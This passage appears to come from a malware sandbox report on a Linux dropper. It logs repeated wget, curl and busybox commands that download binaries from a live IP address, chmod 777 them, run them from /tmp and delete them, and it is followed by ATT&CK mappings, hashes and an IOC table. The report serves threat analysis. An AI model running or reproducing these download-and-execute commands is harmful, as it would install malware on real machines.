  curl -O http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:878
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  PID:879
- /bin/chmod
  chmod 777 0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  - File and Directory Permissions Modification
  PID:880
- /tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  ./0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  - Executes dropped EXE
  PID:881
- /bin/rm
  rm 0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
  2⤵
  PID:882
- /usr/bin/wget
  wget http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  PID:883
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:884
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  PID:885
- /bin/chmod
  chmod 777 SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  - File and Directory Permissions Modification
  PID:886
- /tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  ./SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  - Executes dropped EXE
  PID:887
- /bin/rm
  rm SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
  2⤵
  PID:888
- /usr/bin/wget
  wget http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  PID:889
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:890
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  PID:891
- /bin/chmod
  chmod 777 vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  - File and Directory Permissions Modification
  PID:892
- /tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  ./vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  - Executes dropped EXE
  PID:893
- /bin/rm
  rm vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
  2⤵
  PID:894
- /usr/bin/wget
  wget http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  PID:895
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:901
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  PID:902
- /bin/chmod
  chmod 777 yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  - File and Directory Permissions Modification
  PID:903
- /tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  ./yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  - Executes dropped EXE
  PID:904
- /bin/rm
  rm yuFnig7SLqukn75LnZmw06l61kE18cmyJU
  2⤵
  PID:905
- /usr/bin/wget
  wget http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  PID:906
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:907
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  PID:908
- /bin/chmod
  chmod 777 D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  ./D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  - Executes dropped EXE
  PID:910
- /bin/rm
  rm D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
  2⤵
  PID:911
- /usr/bin/wget
  wget http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  PID:912
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:913
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  PID:914
- /bin/chmod
  chmod 777 5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  - File and Directory Permissions Modification
  PID:915
- /tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  ./5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  - Executes dropped EXE
  PID:916
- /bin/rm
  rm 5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
  2⤵
  PID:917
- /usr/bin/wget
  wget http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  PID:918
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:919
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  PID:920
- /bin/chmod
  chmod 777 cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  - File and Directory Permissions Modification
  PID:921
- /tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  ./cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  - Executes dropped EXE
  PID:922
- /bin/rm
  rm cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
  2⤵
  PID:923
- /usr/bin/wget
  wget http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  PID:924
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:925
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  PID:926
- /bin/chmod
  chmod 777 Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  - File and Directory Permissions Modification
  PID:927
- /tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  ./Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  - Executes dropped EXE
  PID:928
- /bin/rm
  rm Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
  2⤵
  PID:929
- /usr/bin/wget
  wget http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  PID:930
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:931
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  PID:932
- /bin/chmod
  chmod 777 RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  - File and Directory Permissions Modification
  PID:933
- /tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  ./RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  - Executes dropped EXE
  PID:934
- /bin/rm
  rm RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
  2⤵
  PID:935

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
memory/761-1-0xb6750000-0xb6761044-memory.dmp

Download
memory/883-2-0xb66d4000-0xb66e5044-memory.dmp

Download
memory/912-3-0xb66f8000-0xb6709044-memory.dmp

Download
memory/912-4-0xb66bc000-0xb66cd044-memory.dmp

Download
memory/913-5-0xb672d000-0xb673e044-memory.dmp

Download
memory/919-6-0xb66da000-0xb66eb044-memory.dmp

Download
memory/924-7-0xb6760000-0xb6771044-memory.dmp

Download

ioc	pid	process
/tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW	686	SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
/tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg	696	vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
/tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK	704	0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
/tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p	719	Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
/tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm	735	RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm
/tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU	752	yuFnig7SLqukn75LnZmw06l61kE18cmyJU
/tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX	769	D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
/tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH	777	5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
/tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O	785	cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
/tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY	801	buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
/tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx	815	Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
/tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r	831	WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
/tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv	839	fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
/tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6	845	KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
/tmp/WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r	851	WIDMTO89nQhutuNGmdj2quGbJ7FuEeaW0r
/tmp/buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY	857	buMon2AQgX5XM3RlLtlmmqFNwKnUC5umrY
/tmp/Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx	863	Hm0qkmEeSETJT3lfayqj1qeJHoFDFLEeTx
/tmp/fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv	869	fmUXsqlAftc2z6t2oI5KlHGpyQ1KCL47jv
/tmp/KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6	875	KB2adoRmT7A3D3lUQ4D65uW54MCsodafV6
/tmp/0xAUqBtxYzscUUXZytllctNeDQXesIeHFK	881	0xAUqBtxYzscUUXZytllctNeDQXesIeHFK
/tmp/SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW	887	SdXWpUx6uSch8bD6kAmZwMXpROlvqj7xJW
/tmp/vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg	893	vjQ4PJhevk47y44eHohAnAb7Lrnm0uNrWg
/tmp/yuFnig7SLqukn75LnZmw06l61kE18cmyJU	904	yuFnig7SLqukn75LnZmw06l61kE18cmyJU
/tmp/D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX	910	D1qtKRE5wwnGVPAOrulQay4Y4Sih3LVMLX
/tmp/5UsXnRC524zBEEk2TH0apfry8KrElbTlAH	916	5UsXnRC524zBEEk2TH0apfry8KrElbTlAH
/tmp/cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O	922	cy16I181L2h0oyuVrDTAgDwzqfZfDRTV4O
/tmp/Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p	928	Ot7JbZTdWhqii4VfudCKQMf3wiR7bRg93p
/tmp/RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm	934	RdiwWF36FzNlM2CWBEp5isVd7a7pyBY8mm